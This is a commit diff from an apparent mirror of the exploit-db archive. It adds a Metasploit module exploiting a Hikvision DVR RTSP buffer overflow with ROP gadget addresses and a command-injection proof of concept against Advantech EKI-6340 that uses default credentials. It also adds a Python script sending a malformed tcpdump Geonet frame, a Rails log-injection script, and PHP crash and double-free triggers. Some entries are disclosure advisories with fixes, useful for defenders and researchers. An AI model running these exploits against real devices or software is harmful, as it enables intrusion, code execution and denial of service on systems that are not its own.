bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 11_26_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-26 04:52:41 +00:00
parent 904c13f502
commit cd1ca949ad
13 changed files with 895 additions and 261 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -31813,7 +31813,6 @@ id,file,description,date,author,platform,type,port
35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0
35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35321,platforms/php/webapps/35321.txt,"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability",2014-11-22,Vulnerability-Lab,php,webapps,0
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
@ -31832,3 +31831,14 @@ id,file,description,date,author,platform,type,port
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0
35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
35349,platforms/php/webapps/35349.txt,"Gollos 2.8 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 Cross Site Scripting, HTML Injection, and Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35351,platforms/php/webapps/35351.txt,"Photopad 1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 'WEBrick::HTTPRequest' Module HTTP Header Injection Vulnerability",2011-02-16,"Jimmy Bandit",multiple,remote,0
35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 'admin/upload-ajax.php' Remote Arbitrary File Upload Vulnerability",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0
35354,platforms/php/dos/35354.txt,"PHP 5.3.5 'grapheme_extract()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-02-17,"Maksymilian Arciemowicz",php,dos,0
35356,platforms/linux/remote/35356.rb,"Hikvision DVR RTSP Request Remote Code Execution",2014-11-24,metasploit,linux,remote,554
35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 Command Injection",2014-11-24,"Core Security",cgi,webapps,80
35358,platforms/php/dos/35358.txt,"PHP 5.5.12 Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0
35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0

Can't render this file because it is too large.

246
platforms/cgi/webapps/35357.txt Executable file
View file

@ -0,0 +1,246 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Advantech EKI-6340 Command Injection
1. *Advisory Information*
Title: Advantech EKI-6340 Command Injection
Advisory ID: CORE-2014-0009
Advisory URL:
http://www.coresecurity.com/advisories/advantech-eki-6340-command-injection
Date published: 2014-11-19
Date of last update: 2014-11-19
Vendors contacted: Advantech
Release mode: User release
2. *Vulnerability Information*
Class: OS Command Injection [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-8387
3. *Vulnerability Description*
The Advantech EKI-6340 [1] series are wireless Mesh AP for outdoor
deployment. With self-healing and self-forming capabilities, the
wireless network is free from interruption even part of Mesh nodes
failed. It's especially critical to infrastructures where wired
solutions are hard to deploy. This Mesh network covers growing rich data
demands such as video security, surveillance and entertainment.
Advantech EKI-6340 series is vulnerable to a OS Command Injection,
which can be exploited by remote attackers to execute arbitrary code and
commands, by using a non privileged user against a vulnerable CGI file.
4. *Vulnerable packages*
. Advantech EKI-6340 V2.05
. Other versions may probably be affected too, but they were not checked.
5. *Vendor Information, Solutions and Workarounds*
Considering that the vendor is not going to fix or update this
device the following recommendations should be taken into consideration
in case of using a vulnerable device:
- Change the 'guest' user password (or delete the user in case
is not used)
- Edit the fshttpd.conf and remove the line
'guest_allow=/cgi/ping.cgi'.
- Check that the 'admin' user doesn't has the default password
as well.
6. *Credits*
This vulnerability was discovered and researched by Facundo Pantaleo
and Flavio Cangini from Core Security Engineering Team. The publication
of this advisory was coordinated by Joaquín Rodríguez Varela from Core
Advisories Team.
7. *Technical Description / Proof of Concept Code*
This vulnerability is caused by an incorrect sanitization of the
input parameters of the file "ping.cgi" that is a symbolic link of
"utility.cgi".
It allows to concatenate commands after the IP direction parameter,
therefore enabling a user to inject OS commands. The "call_ping"
function inside the file "/usr/webui/webroot/cgi/utility.cgi" is where
the vulnerability lays.
The CGI file requieres authentication, but the "admin" user is not
the only one allowed to execute it. Based on the webservers default
configuration file, the "guest" has permissons over it as well. This
user is rarely disbled and its password tends to remain unchanged. This
default credentials are username "user" and password "user" as well.
Below is an example of the webserver (based on Mongoose webserver [2])
default configuration file "fshttpd.conf":
/-----
listening_ports=80,443s
user_admin=admin
pass_admin=admin
user_guest=user
pass_guest=user
document_root=/usr/webui/webroot
authorize_uri=/authorize
unauthorize_uri=/unauthorize
login_uri=/login.html
logout_uri=/logout.html
login_fail_uri=/err/login_fail.html
sessions_full_uri=/err/nosessions.html
no_redirect_uri=/cgi/fwupstatus.cgi
guest_allow=/admin/FWUPStatus.html
guest_allow=/status/*
guest_allow=/utility/Ping.html
guest_allow=/utility/RssiCalc.html
guest_allow=/utility/FresnelZone.html
guest_allow=/cgi/ping.cgi
guest_allow=/cgi/status_query.cgi
guest_allow=/cgi/nodeinfo_query_MAC.cgi
guest_allow=/cgi/nodeinfo_query.cgi
guest_allow=/cgi/nodeinfo_query_AP.cgi
guest_allow=/cgi/fwupstatus.cgi
nologin_allow=/
nologin_allow=/index.*
nologin_allow=/css/*
nologin_allow=/template/*
nologin_allow=/images/*
nologin_allow=/images/dhtmlxcalendar_dhx_skyblue/*
nologin_allow=/js/*
nologin_allow=/favicon.ico
nologin_allow=/err/*
-----/
7.1. *Proof of Concept*
/-----
http://localhost:80/cgi/ping.cgi?pinghost=127.0.0.1;sleep%2010&pingsize=3
When requested for credentials use the following:
User: user
Password: user
-----/
8. *Report Timeline*
. 2014-10-01:
Initial notification sent to ICS-CERT informing of the vulnerability
and requesting the vendor's contact information.
. 2014-10-01:
ICS-CERT informs that they will ask the vendor if they want to
coordinate directly with us or if they prefer to have ICS-CERT mediate.
They request the vulnerability report.
. 2014-10-01:
ICS-CERT informs that the vendor answered that they would like the
ICS-CERT to mediate the coordination of the advisory. They requested
again the vulnerability report.
. 2014-10-01:
We send the vulnerability detail, including technical description
and a PoC.
. 2014-10-09:
We request a status update on the reported vulnerability.
. 2014-10-20:
ICS-CERT informs that the vendor plans to discontinue EKI-6340 early
next year and therefore they will not fix it.
. 2014-11-13:
We inform them that we will publish this advisory as user release on
Wednesday 19th of November.
. 2014-11-19:
Advisory CORE-2014-0009 published.
9. *References*
[1]
http://www.advantech.com.tw/products/56bfcf50-1ada-4ac6-aaf5-4e726ebad002/EKI-6340/mod_04f43dee-f991-44f1-aa1b-bbb1b30f2a72.aspx.
[2] https://code.google.com/p/mongoose/.
10. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security*
Core Security enables organizations to get ahead of threats with
security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security can
be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2014 Core Security
and (c) 2014 CoreLabs, and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

140
platforms/linux/remote/35356.rb Executable file
View file

@ -0,0 +1,140 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the RTSP request parsing
code of Hikvision DVR appliances. The Hikvision DVR devices record
video feeds of surveillance cameras and offer remote administration
and playback of recorded footage.
The vulnerability is present in several models / firmware versions
but due to the available test device this module only supports
the DS-7204 model.
},
'Author' =>
[
'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-4880' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
],
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Privileged' => true,
'Targets' =>
[
#
# ROP targets are difficult to represent in the hash, use callbacks instead
#
[ "DS-7204 Firmware V2.2.10 build 131009", {
# The callback handles all target-specific settings
:callback => :target_ds7204_1,
'g_adjustesp' => 0x002c828c,
# ADD SP, SP, #0x350
# LDMFD SP!, {R4-R6,PC}
'g_r3fromsp' => 0x00446f80,
# ADD R3, SP, #0x60+var_58
# BLX R6
'g_blxr3_pop' => 0x00456360,
# BLX R3
# LDMFD SP!, {R1-R7,PC}
'g_popr3' => 0x0000fe98,
# LDMFD SP!, {R3,PC}
} ],
[ "Debug Target", {
# The callback handles all target-specific settings
:callback => :target_debug
} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2014'))
register_options(
[
Opt::RPORT(554)
], self.class)
end
def exploit
unless self.respond_to?(target[:callback])
fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
end
device_rop = self.send(target[:callback])
request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
request << "CSeq: 7\r\n"
request << "Authorization: Basic "
request << rand_text_alpha(0x280 + 34)
request << [target["g_adjustesp"]].pack("V")[0..2]
request << "\r\n\r\n"
request << rand_text_alpha(19)
# now append the ropchain
request << device_rop
request << rand_text_alpha(8)
request << payload.encoded
connect
sock.put(request)
disconnect
end
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def target_ds7204_1
# Create a fixed-size buffer for the rop chain
ropbuf = rand_text_alpha(24)
# CHAIN = [
# 0, #R4 pop adjustsp
# 0, #R5 pop adjustsp
# GADGET_BLXR3_POP, #R6 pop adjustsp
# GADGET_POPR3,
# 0, #R3 pop
# GADGET_R3FROMSP,
# ]
ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")
ropbuf[12,4] = [target["g_popr3"]].pack("V")
ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")
return ropbuf
end
# Generate a buffer that provides a starting point for exploit development
def target_debug
Rex::Text.pattern_create(2000)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
end

79
platforms/multiple/dos/35359.txt Executable file
View file

@ -0,0 +1,79 @@
CVE-2014-8768 tcpdump denial of service in verbose mode using malformed
Geonet payload
1. Background
tcpdump is a powerful command-line packet analyzer. It allows the user
to intercept and display TCP/IP and other packets being transmitted or
received over a network to which the computer is attached.
2. Summary Information
It was found out that malformed network traffic (Geonet-based) can lead
to an application crash (denial of service) if verbose output of tcpdump
monitoring the network is used.
3. Technical Description
The application decoder for the geonet protocol fails to perform
external input validation and performs insufficient checking on length
computations leading to an unsafe decrement and underflow in the function
geonet_print(netdissect_options *ndo, const u_char *eth, const u_char
*bp, u_int length)
The affected variable is length which is later on used to print a memory
chunk which eventually leads to a segfault. The function contains
several unsafe computations updating the length variable.
To reproduce start tcpdump on a network interface
sudo tcpdump -i lo -s 0 -n -v
(running the program with sudo might hide the segfault message on
certain environments, see dmesg for details)
and use the following python program to generate a frame on the network
(might also need sudo):
#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
geonet_frame =
"\x00\x1f\xc6\x51\x07\x07\x07\x07\x07\x07\x07\x07\x07\x07\xc6\x51\x07\x07\x07\x07\x07\x07\xef\x06\x07\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\x00\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x01\x01\x01\x99\x80\x00\x35\x00\x29\x16\xa5\x01\x76\x01\x00\x00\xff\x00\x00\x01\x00\x00\x00"
s.send(geonet_frame)
4. Affected versions
Affected versions are 4.5.0 through 4.6.2
(segfaults were reproducible in versions up to 4.6.1 on Ubuntu 14.04,
but not reliably in 4.6.2. Code audit showed that unsafe computations
are performed in 4.6.2, but the trigger frame might need to look different).
5. Fix
The problem is fixed in the upcoming version tcpdump 4.7.0
6. Advisory Timeline
2014-11-08 Discovered
2014-11-09 Requested CVE
2014-11-11 Reported vendor by email
2014-11-12 Vendor made a fix available as repository patch
2014-11-13 CVE number received
2014-11-13 Published CVE advisory
7. Credit
The issue was found by
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
using a slightly enhanced version of american fuzzy lop
(https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.

90
platforms/multiple/remote/35352.rb Executable file
View file

@ -0,0 +1,90 @@
source: http://www.securityfocus.com/bid/46423/info
Ruby on Rails is prone to a vulnerability that allows attackers to inject arbitrary content into the 'X-Forwarded-For', 'X-Forwarded-Host' and 'X-Forwarded-Server' HTTP headers because the 'WEBrick::HTTPRequest' module fails to sufficiently sanitize input.
By inserting arbitrary data into the affected HTTP header field, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTML-injection, and other attacks.
NOTE: This issue only affects requests sent from clients on the same subnet as the server.
Ruby on Rails 3.0.5 is vulnerable; other versions may also be affected.
#Encoding: UTF-8
#
# Log-File-Injection - Ruby on Rails 3.05
# possibilities:
# - possible date back attacks (tried with request-log-analyzer: worked but teaser_check_warnings)
# - ip spoofing
# - binary log-injections
# - DOS if ip is used with an iptables-ban-script
#
# !! works only on intranet apps !!
#
# Fix:
# validate request.remote_ip until they fix it
# -----------------------
# jimmybandit.com
# http://webservsec.blogspot.com
require 'rubygems'
require 'mechanize'
require 'iconv'
ip = "192.168.1.21 "
# some shell code just for binary-data demo
payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\0x0A" # date back attacks with ipspoofing
# payload = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" binarypayload is also possible
a = Mechanize.new
a.pre_connect_hooks << lambda { |p| p[:request]['X-Forwarded-For'] = payload }
page = a.get('http://192.168.1.21/people')
# results
=begin
################################
production.log:
################################
Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011
Processing by PeopleController#index as
Rendered people/index.html.erb within layouts/application (24.4ms)
Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms)
################################
request-log-analyzer:
################################
web@debian:~/testapp/log$ request-log-analyzer production.log
Request-log-analyzer, by Willem van Bergen and Bart ten Brinke - version 1.10.0
Website: http://railsdoctors.com
production.log: 100% [==========] Time: 00:00:00
Request summary
???????????????????????
Parsed lines: 14
Skipped lines: 0 <-------
Parsed requests: 7 <-------
Skipped requests: 0
Warnings: teaser_check_failed: 7
First request: 2009-01-01 00:00:12
Last request: 2009-01-01 00:00:12
Total time analyzed: 0 days
Request distribution per hour
????????????????????????????
0:00 ? 7 hits/day ? ?????????????????????????????????
1:00 ? 0 hits/day ?
...
=end

11
platforms/php/dos/35354.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/46429/info
PHP is prone to a denial-of-service vulnerability caused by a NULL-pointer dereference.
An attacker can exploit this issue to cause an appliation written in PHP to crash, denying service to legitimate users.
PHP 5.3.5 is vulnerable; other versions may also be affected.
The following proof-of-concept is available:
grapheme_extract('a',-1);

198
platforms/php/dos/35358.txt Executable file
View file

@ -0,0 +1,198 @@
Full Package: http://www.exploit-db.com/sploits/35358.tgz
Description:
------------
PHP 5.5.12 suffers from a memory corruption vulnerability that could potentially be exploited to achieve remote code execution. The vulnerability exists due to inconsistent behavior in the get_icu_value_internal function of ext\intl\locale\locale_methods.c. In most cases, get_icu_value_internal allocates memory that the caller is expected to free. However, if the first argument, loc_name, satisfies the conditions specified by the isIDPrefix macro (figure 1), and fromParseLocal is true, loc_name itself is returned. If a caller abides by contract and frees the return value of such a call, then the pointer passed via loc_name is freed again elsewhere, a double free occurs.
Figure 1. Macros used by get_icu_value_internal.
#define isIDSeparator(a) (a == '_' || a == '-')
[...]
#define isPrefixLetter(a) ((a=='x')||(a=='X')||(a=='i')||(a=='I'))
[...]
#define isIDPrefix(s) (isPrefixLetter(s[0])&&isIDSeparator(s[1]))
The zif_locale_parse function, which is exported to PHP as Locale::parseLocale, makes a call to get_icu_value_internal with potentially untrusted data. By passing a specially crafted locale (figure 2), remote code execution may be possible. The exploitability of this vulnerability is dependent on the attack surface of a given application. In instances where the locale string is exposed as a user configuration setting, it may be possible to achieve either pre- or post-authentication remote code execution. In other scenarios this vulnerability may serve as a means to achieve privilege escalation.
Figure 2. A call to Locale::parseLocale that triggers the exploitable condition.
Locale::parseLocale("x-AAAAAA");
Details for the two frees are shown in figures 3 and 4.
Figure 3. The first free.
0:000> kP
ChildEBP RetAddr
016af25c 7146d7a3 php5ts!_efree(
void * ptr = 0x030bf1e0)+0x62 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]
016af290 7146f6a2 php_intl!add_array_entry(
char * loc_name = 0x0179028c "",
struct _zval_struct * hash_arr = 0x00000018,
char * key_name = 0x71489e60 "language",
void *** tsrm_ls = 0x7146f6a2)+0x1d3 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\ext\intl\locale\locale_methods.c @ 1073]
016af2b0 0f0c15ab php_intl!zif_locale_parse(
int ht = 0n1,
struct _zval_struct * return_value = 0x030bf4c8,
struct _zval_struct ** return_value_ptr = 0x00000000,
struct _zval_struct * this_ptr = 0x00000000,
int return_value_used = 0n1,
void *** tsrm_ls = 0x0178be38)+0xb2 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\ext\intl\locale\locale_methods.c @ 1115]
016af314 0f0c0c07 php5ts!zend_do_fcall_common_helper_SPEC(
struct _zend_execute_data * execute_data = 0x0179028c,
void *** tsrm_ls = 0x00000018)+0x1cb [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 551]
016af358 0f114757 php5ts!execute_ex(
struct _zend_execute_data * execute_data = 0x030bef20,
void *** tsrm_ls = 0x0178be38)+0x397 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 363]
016af380 0f0e60ea php5ts!zend_execute(
struct _zend_op_array * op_array = 0x030be5f0,
void *** tsrm_ls = 0x00000007)+0x1c7 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 388]
016af3b4 0f0e4a00 php5ts!zend_execute_scripts(
int type = 0n8,
void *** tsrm_ls = 0x00000001,
struct _zval_struct ** retval = 0x00000000,
int file_count = 0n3)+0x14a [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend.c @ 1317]
016af5c0 00cc21fb php5ts!php_execute_script(
struct _zend_file_handle * primary_file = <Memory access error>,
void *** tsrm_ls = <Memory access error>)+0x190 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\main\main.c @ 2506]
016af844 00cc2ed1 php!do_cli(
int argc = 0n24707724,
char ** argv = 0x00000018,
void *** tsrm_ls = 0x0178be38)+0x87b [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 995]
016af8e0 00cca05e php!main(
int argc = 0n2,
char ** argv = 0x01791d68)+0x4c1 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 1378]
016af920 76e1919f php!__tmainCRTStartup(void)+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 536]
016af92c 770ba8cb KERNEL32!BaseThreadInitThunk+0xe
016af970 770ba8a1 ntdll!__RtlUserThreadStart+0x20
016af980 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> ub eip
php5ts!_efree+0x49 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]:
0f0b1ef9 732e jae php5ts!_efree+0x79 (0f0b1f29)
0f0b1efb 817e4c00000200 cmp dword ptr [esi+4Ch],20000h
0f0b1f02 7325 jae php5ts!_efree+0x79 (0f0b1f29)
0f0b1f04 8bc2 mov eax,edx
0f0b1f06 c1e803 shr eax,3
0f0b1f09 8d0c86 lea ecx,[esi+eax*4]
0f0b1f0c 8b4148 mov eax,dword ptr [ecx+48h]
0f0b1f0f 894708 mov dword ptr [edi+8],eax
0:000> u eip
php5ts!_efree+0x62 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]:
0f0b1f12 897948 mov dword ptr [ecx+48h],edi
0f0b1f15 01564c add dword ptr [esi+4Ch],edx
0f0b1f18 a148456a0f mov eax,dword ptr [php5ts!zend_unblock_interruptions (0f6a4548)]
0f0b1f1d 85c0 test eax,eax
0f0b1f1f 0f851d040000 jne php5ts!_efree+0x492 (0f0b2342)
0f0b1f25 5f pop edi
0f0b1f26 5e pop esi
0f0b1f27 59 pop ecx
0:000> ?edi+8
Evaluate expression: 51114464 = 030bf1e0
0:000> dc edi+8
030bf1e0 00000000 41414141 00000000 00000000 ....AAAA........
030bf1f0 00000011 00000019 61636f6c 0300656c ........locale..
030bf200 00000011 00000011 6e697270 00725f74 ........print_r.
030bf210 00000109 00000011 030bf320 030bf210 ........ .......
030bf220 01790494 00000000 00000000 00000000 ..y.............
030bf230 00000000 00000000 00000000 00000000 ................
030bf240 00000000 00000000 00000000 00000000 ................
030bf250 00000000 00000000 00000000 00000000 ................
Figure 4. The second free.
0:000> kP
ChildEBP RetAddr
016af2c4 0f0c1813 php5ts!_zval_dtor_func(
struct _zval_struct * zvalue = 0x030bf3f8)+0x7f [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]
016af314 0f0c0c07 php5ts!zend_do_fcall_common_helper_SPEC(
struct _zend_execute_data * execute_data = 0x0179028c,
void *** tsrm_ls = 0x00000018)+0x433 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 642]
016af358 0f114757 php5ts!execute_ex(
struct _zend_execute_data * execute_data = 0x030bef20,
void *** tsrm_ls = 0x0178be38)+0x397 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 363]
016af380 0f0e60ea php5ts!zend_execute(
struct _zend_op_array * op_array = 0x030be5f0,
void *** tsrm_ls = 0x00000007)+0x1c7 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 388]
016af3b4 0f0e4a00 php5ts!zend_execute_scripts(
int type = 0n8,
void *** tsrm_ls = 0x00000001,
struct _zval_struct ** retval = 0x00000000,
int file_count = 0n3)+0x14a [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend.c @ 1317]
016af5c0 00cc21fb php5ts!php_execute_script(
struct _zend_file_handle * primary_file = <Memory access error>,
void *** tsrm_ls = <Memory access error>)+0x190 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\main\main.c @ 2506]
016af844 00cc2ed1 php!do_cli(
int argc = 0n24707724,
char ** argv = 0x00000018,
void *** tsrm_ls = 0x0178be38)+0x87b [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 995]
016af8e0 00cca05e php!main(
int argc = 0n2,
char ** argv = 0x01791d68)+0x4c1 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 1378]
016af920 76e1919f php!__tmainCRTStartup(void)+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 536]
016af92c 770ba8cb KERNEL32!BaseThreadInitThunk+0xe
016af970 770ba8a1 ntdll!__RtlUserThreadStart+0x20
016af980 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> ub eip
php5ts!_zval_dtor_func+0x5e [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]:
0f0b1cae 0f8394000000 jae php5ts!_zval_dtor_func+0xf8 (0f0b1d48)
0f0b1cb4 817f4c00000200 cmp dword ptr [edi+4Ch],20000h
0f0b1cbb 0f8387000000 jae php5ts!_zval_dtor_func+0xf8 (0f0b1d48)
0f0b1cc1 8bc2 mov eax,edx
0f0b1cc3 c1e803 shr eax,3
0f0b1cc6 8d0c87 lea ecx,[edi+eax*4]
0f0b1cc9 8b4148 mov eax,dword ptr [ecx+48h]
0f0b1ccc 894608 mov dword ptr [esi+8],eax
0:000> u eip
php5ts!_zval_dtor_func+0x7f [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]:
0f0b1ccf 897148 mov dword ptr [ecx+48h],esi
0f0b1cd2 01574c add dword ptr [edi+4Ch],edx
0f0b1cd5 a148456a0f mov eax,dword ptr [php5ts!zend_unblock_interruptions (0f6a4548)]
0f0b1cda 85c0 test eax,eax
0f0b1cdc 0f8591010000 jne php5ts!_zval_dtor_func+0x223 (0f0b1e73)
0f0b1ce2 5f pop edi
0f0b1ce3 5e pop esi
0f0b1ce4 c3 ret
0:000> ?esi+8
Evaluate expression: 51114464 = 030bf1e0
0:000> dc esi+8
030bf1e0 030bf1d8 41414141 00000000 00000000 ....AAAA........
030bf1f0 00000011 00000019 61636f6c 0300656c ........locale..
030bf200 00000011 00000011 6e697270 00725f74 ........print_r.
030bf210 00000109 00000011 030bf320 030bf210 ........ .......
030bf220 01790494 00000000 00000000 00000000 ..y.............
030bf230 00000000 00000000 00000000 00000000 ................
030bf240 00000000 00000000 00000000 00000000 ................
030bf250 00000000 00000000 00000000 00000000 ................
The outcome of the double free depends on the arrangement of the heap. A simple script that produces a variety of read access violations is shown in figure 5, and another that reliably produces data execution prevention access violations is provided in figure 6.
Figure 5. A script that produces a variety of AVs.
<?php
Locale::parseLocale("x-AAAAAA");
$foo = new SplTempFileObject();
?>
Figure 6. A script that reliably produces DEPAVs.
<?php
Locale::parseLocale("x-7-644T-42-1Q-7346A896-656s-75nKaOG");
$pe = new SQLite3($pe, new PDOException(($pe->{new ReflectionParameter(TRUE, new RecursiveTreeIterator((null > ($pe+=new RecursiveCallbackFilterIterator((object)$G16 = new Directory(), DatePeriod::__set_state()))), (array)$h453 = new ReflectionMethod(($pe[TRUE]), $G16->rewind((array)"mymqaodaokubaf")), ($h453->getShortName() === null), ($I68TB = new InvalidArgumentException($H03 = new DOMStringList(), null, (string)MessageFormatter::create($sC = new AppendIterator(), new DOMUserDataHandler())) & null)))}), ($h453[(bool)DateInterval::__set_state()]), new PDOStatement()), TRUE);
$H03->item((unset)$gn = new SplStack());
$sC->valid();
?>
To fix the vulnerability, get_icu_value_internal should be modified to return a copy of loc_name rather than loc_name itself. This can be done easily using the estrdup function. The single line fix is shown in figures 7 and 8.
Figure 7. The original code.
if( strcmp(tag_name , LOC_LANG_TAG)==0 ){
if( strlen(loc_name)>1 && (isIDPrefix(loc_name) ==1 ) ){
return (char *)loc_name;
}
}
Figure 8. The fixed code.
if( strcmp(tag_name , LOC_LANG_TAG)==0 ){
if( strlen(loc_name)>1 && (isIDPrefix(loc_name) ==1 ) ){
return estrdup(loc_name);
}
}

260
platforms/php/webapps/35321.txt
View file

@ -1,260 +0,0 @@
Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
Release Date:
=============
2014-11-07
Vulnerability Laboratory ID (VL-ID):
====================================
1353
Common Vulnerability Scoring System:
====================================
